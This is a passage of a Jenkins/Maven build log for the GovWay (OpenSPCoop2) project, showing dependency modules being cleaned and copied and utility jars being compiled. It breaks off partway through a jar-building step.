/var/lib/jenkins/workspace/GovWay/lib/spring-ldap (includes = [*.jar], excludes = []) 17:47:13 [INFO] 17:47:13 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.spring-ldap --- 17:47:13 [INFO] 17:47:13 [INFO] ----------< org.openspcoop2:org.openspcoop2.spring-security >----------- 17:47:13 [INFO] Building dependencies.spring-security 1.0 [30/67] 17:47:13 [INFO] from mvn/dependencies/spring-security/pom.xml 17:47:13 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:13 [INFO] 17:47:13 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.spring-security --- 17:47:13 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/spring-security (includes = [*.jar], excludes = []) 17:47:13 [INFO] 17:47:13 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.spring-security --- 17:47:13 [INFO] 17:47:13 [INFO] --------------< org.openspcoop2:org.openspcoop2.swagger >--------------- 17:47:13 [INFO] Building dependencies.swagger 1.0 [31/67] 17:47:13 [INFO] from mvn/dependencies/swagger/pom.xml 17:47:13 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:13 [INFO] 17:47:13 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.swagger --- 17:47:13 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/swagger (includes = [*.jar], excludes = []) 17:47:13 [INFO] 17:47:13 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.swagger --- 17:47:13 [INFO] 17:47:13 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.swagger --- 17:47:14 [INFO] Executing tasks 17:47:14 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/swagger/swagger-parser-v3-2.1.29.jar 17:47:14 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/swagger/swagger-request-validator-core-2.44.9.jar 17:47:14 [INFO] Executed tasks 17:47:14 [INFO] 17:47:14 [INFO] ---------------< org.openspcoop2:org.openspcoop2.wss4j >---------------- 17:47:14 [INFO] Building dependencies.wss4j 1.0 [32/67] 17:47:14 [INFO] from mvn/dependencies/wss4j/pom.xml 17:47:14 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:14 [INFO] 17:47:14 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.wss4j --- 17:47:14 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/wss4j (includes = [*.jar], excludes = []) 17:47:14 [INFO] 17:47:14 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.wss4j --- 17:47:14 [INFO] 17:47:14 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.wss4j --- 17:47:14 [INFO] Executing tasks 17:47:14 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/wss4j/wss4j-ws-security-common-4.0.0.jar 17:47:14 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/wss4j/wss4j-ws-security-dom-4.0.0.jar 17:47:14 [INFO] Executed tasks 17:47:14 [INFO] 17:47:14 [INFO] -------------< org.openspcoop2:org.openspcoop2.testsuite >-------------- 17:47:14 [INFO] Building dependencies.testsuite 1.0 [33/67] 17:47:14 [INFO] from mvn/dependencies/testsuite/pom.xml 17:47:14 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:14 [INFO] 17:47:14 [INFO] ----------< org.openspcoop2:org.openspcoop2.testsuite.axis14 >---------- 17:47:14 [INFO] Building dependencies.testsuite.axis14 1.0 [34/67] 17:47:14 [INFO] from mvn/dependencies/testsuite/axis14/pom.xml 17:47:14 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:14 [INFO] 17:47:14 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.axis14 --- 17:47:14 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/axis14 (includes = [*.jar], excludes = []) 17:47:14 [INFO] 17:47:14 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.axis14 --- 17:47:14 [INFO] 17:47:14 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.testsuite.axis14 --- 17:47:14 [INFO] Executing tasks 17:47:14 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/axis14/axis-1.4.jar 17:47:14 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/axis14/axis-jaxrpc-1.4.jar 17:47:14 [INFO] Executed tasks 17:47:14 [INFO] 17:47:14 [INFO] ----< org.openspcoop2:org.openspcoop2.testsuite.applicationServer >----- 17:47:14 [INFO] Building dependencies.testsuite.as 1.0 [35/67] 17:47:14 [INFO] from mvn/dependencies/testsuite/applicationServer/pom.xml 17:47:14 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:14 [INFO] 17:47:14 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly27 >-- 17:47:14 [INFO] Building dependencies.testsuite.as.wildfly27 1.0 [36/67] 17:47:14 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly27/pom.xml 17:47:14 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:14 [INFO] 17:47:14 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly27 --- 17:47:14 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly27 (includes = [*.jar], excludes = []) 17:47:14 [INFO] 17:47:14 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly27 --- 17:47:14 [INFO] 17:47:14 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly28 >-- 17:47:14 [INFO] Building dependencies.testsuite.as.wildfly28 1.0 [37/67] 17:47:14 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly28/pom.xml 17:47:14 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:15 [INFO] 17:47:15 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly28 --- 17:47:15 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly28 (includes = [*.jar], excludes = []) 17:47:15 [INFO] 17:47:15 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly28 --- 17:47:15 [INFO] 17:47:15 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly35 >-- 17:47:15 [INFO] Building dependencies.testsuite.as.wildfly35 1.0 [38/67] 17:47:15 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly35/pom.xml 17:47:15 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:15 [INFO] 17:47:15 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly35 --- 17:47:15 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly35 (includes = [*.jar], excludes = []) 17:47:15 [INFO] 17:47:15 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly35 --- 17:47:15 [INFO] 17:47:15 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly36 >-- 17:47:15 [INFO] Building dependencies.testsuite.as.wildfly36 1.0 [39/67] 17:47:15 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly36/pom.xml 17:47:15 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:15 [INFO] 17:47:15 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly36 --- 17:47:15 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly36 (includes = [*.jar], excludes = []) 17:47:15 [INFO] 17:47:15 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly36 --- 17:47:15 [INFO] 17:47:15 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly37 >-- 17:47:15 [INFO] Building dependencies.testsuite.as.wildfly37 1.0 [40/67] 17:47:15 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly37/pom.xml 17:47:15 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:15 [INFO] 17:47:15 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly37 --- 17:47:15 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly37 (includes = [*.jar], excludes = []) 17:47:15 [INFO] 17:47:15 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly37 --- 17:47:15 [INFO] 17:47:15 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly38 >-- 17:47:15 [INFO] Building dependencies.testsuite.as.wildfly38 1.0 [41/67] 17:47:15 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly38/pom.xml 17:47:15 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:15 [INFO] 17:47:15 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly38 --- 17:47:15 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly38 (includes = [*.jar], excludes = []) 17:47:15 [INFO] 17:47:15 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly38 --- 17:47:15 [INFO] 17:47:15 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly39 >-- 17:47:15 [INFO] Building dependencies.testsuite.as.wildfly39 1.0 [42/67] 17:47:15 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly39/pom.xml 17:47:15 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:15 [INFO] 17:47:15 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly39 --- 17:47:15 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly39 (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly39 --- 17:47:16 [INFO] 17:47:16 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.tomcat10 >-- 17:47:16 [INFO] Building dependencies.testsuite.as.tomcat10 1.0 [43/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/applicationServer/tomcat10/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.tomcat10 --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/tomcat10 (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.tomcat10 --- 17:47:16 [INFO] 17:47:16 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.tomcat11 >-- 17:47:16 [INFO] Building dependencies.testsuite.as.tomcat11 1.0 [44/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/applicationServer/tomcat11/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.tomcat11 --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/tomcat11 (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.tomcat11 --- 17:47:16 [INFO] 17:47:16 [INFO] -----------< org.openspcoop2:org.openspcoop2.testsuite.test >----------- 17:47:16 [INFO] Building dependencies.testsuite.test 1.0 [45/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.testng >-------- 17:47:16 [INFO] Building dependencies.testsuite.test.testng 1.0 [46/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/testng/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.testng --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/testng (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.testng --- 17:47:16 [INFO] 17:47:16 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.junit4 >-------- 17:47:16 [INFO] Building dependencies.testsuite.test.junit4 1.0 [47/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/junit4/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.junit4 --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/junit4 (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.junit4 --- 17:47:16 [INFO] 17:47:16 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.test.karate09 >------- 17:47:16 [INFO] Building dependencies.testsuite.test.karate09 1.0 [48/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/karate09/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.karate09 --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/karate09 (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.karate09 --- 17:47:16 [INFO] 17:47:16 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.logback >------- 17:47:16 [INFO] Building dependencies.testsuite.test.logback 1.0 [49/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/logback/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.logback --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/logback (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.logback --- 17:47:16 [INFO] 17:47:16 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.test.httpcore4 >------ 17:47:16 [INFO] Building dependencies.testsuite.test.httpcore4 1.0 [50/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/httpcore4/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.httpcore4 --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/httpcore4 (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.httpcore4 --- 17:47:16 [INFO] 17:47:16 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.spring5 >------- 17:47:16 [INFO] Building dependencies.testsuite.test.spring5 1.0 [51/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/spring5/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.spring5 --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/spring5 (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.spring5 --- 17:47:16 [INFO] 17:47:16 [INFO] ----< org.openspcoop2:org.openspcoop2.testsuite.test.spring-ldap2 >----- 17:47:16 [INFO] Building dependencies.testsuite.test.spring-ldap2 1.0 [52/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/spring-ldap2/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.spring-ldap2 --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/spring-ldap2 (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.spring-ldap2 --- 17:47:16 [INFO] 17:47:16 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.test.apacheds >------- 17:47:16 [INFO] Building dependencies.testsuite.test.apacheds 1.0 [53/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/apacheds/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.apacheds --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/apacheds (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.apacheds --- 17:47:16 [INFO] 17:47:16 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.testsuite.test.apacheds --- 17:47:16 [INFO] Executing tasks 17:47:16 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/testsuite/apacheds/apacheds-all-2.0.0.AM27.jar 17:47:16 [INFO] Executed tasks 17:47:16 [INFO] 17:47:16 [INFO] --------< org.openspcoop2:org.openspcoop2.testsuite.test.cxf3 >--------- 17:47:16 [INFO] Building dependencies.testsuite.test.cxf3 1.0 [54/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/test/cxf3/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.cxf3 --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/cxf3 (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.cxf3 --- 17:47:16 [INFO] 17:47:16 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.staticAnalysis >------ 17:47:16 [INFO] Building dependencies.testsuite.staticAnalysis 1.0 [55/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/staticAnalysis/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.staticAnalysis --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/staticAnalysis (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.staticAnalysis --- 17:47:16 [INFO] 17:47:16 [INFO] -----< org.openspcoop2:org.openspcoop2.testsuite.dynamicAnalysis >------ 17:47:16 [INFO] Building dependencies.testsuite.dynamicAnalysis 1.0 [56/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/dynamicAnalysis/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.dynamicAnalysis --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/dynamicAnalysis (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.dynamicAnalysis --- 17:47:16 [INFO] 17:47:16 [INFO] ---------< org.openspcoop2:org.openspcoop2.testsuite.coverage >--------- 17:47:16 [INFO] Building dependencies.testsuite.coverage 1.0 [57/67] 17:47:16 [INFO] from mvn/dependencies/testsuite/coverage/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.coverage --- 17:47:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/coverage (includes = [*.jar], excludes = []) 17:47:16 [INFO] 17:47:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.coverage --- 17:47:16 [INFO] 17:47:16 [INFO] --------------< org.openspcoop2:org.openspcoop2.compile >--------------- 17:47:16 [INFO] Building compile 1.0 [58/67] 17:47:16 [INFO] from mvn/compile/pom.xml 17:47:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:16 [INFO] 17:47:16 [INFO] --- antrun:3.1.0:run (default) @ org.openspcoop2.compile --- 17:47:17 [INFO] Executing tasks 17:47:25 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/dist 17:47:33 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build 17:47:33 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/tmp 17:47:33 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist 17:47:43 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:47:43 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:47:43 [WARNING] [echo] **************************************** 17:47:43 [WARNING] [echo] **** DEBUG MODE ON ***** 17:47:43 [WARNING] [echo] **************************************** 17:47:43 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/utils 17:47:43 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:47:44 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils] 17:47:44 [INFO] [javac] Compiling 37 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:47:53 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils_RELEASE.jar 17:47:53 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:47:58 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:47:58 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:47:58 [WARNING] [echo] **************************************** 17:47:58 [WARNING] [echo] **** DEBUG MODE ON ***** 17:47:58 [WARNING] [echo] **************************************** 17:47:58 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:47:58 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/instrument] 17:47:58 [INFO] [javac] Compiling 2 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:47:59 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-instrument_RELEASE.jar 17:47:59 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:04 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:04 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:04 [WARNING] [echo] **************************************** 17:48:04 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:04 [WARNING] [echo] **************************************** 17:48:04 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:04 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/resources] 17:48:04 [INFO] [javac] Compiling 17 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:07 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-resources_RELEASE.jar 17:48:07 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:11 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:11 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:11 [WARNING] [echo] **************************************** 17:48:11 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:11 [WARNING] [echo] **************************************** 17:48:11 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:11 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/mime] 17:48:11 [INFO] [javac] Compiling 4 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:12 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-mime_RELEASE.jar 17:48:12 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:16 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:16 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:16 [WARNING] [echo] **************************************** 17:48:16 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:16 [WARNING] [echo] **************************************** 17:48:16 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:16 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/date] 17:48:16 [INFO] [javac] Compiling 18 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:18 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-date_RELEASE.jar 17:48:18 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:18 [WARNING] [echo] skipJavaIncompatiblePackages: , 17:48:21 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:21 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:21 [WARNING] [echo] **************************************** 17:48:21 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:21 [WARNING] [echo] **************************************** 17:48:21 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:21 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/io] 17:48:21 [INFO] [javac] Compiling 27 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:23 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-io_RELEASE.jar 17:48:23 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:26 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:26 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:26 [WARNING] [echo] **************************************** 17:48:26 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:26 [WARNING] [echo] **************************************** 17:48:26 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:26 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/random] 17:48:26 [INFO] [javac] Compiling 4 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:28 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-random_RELEASE.jar 17:48:28 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:31 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:31 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:31 [WARNING] [echo] **************************************** 17:48:31 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:31 [WARNING] [echo] **************************************** 17:48:31 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:31 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/properties] 17:48:31 [INFO] [javac] Compiling 5 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:33 [INFO] [jar] Building jar: 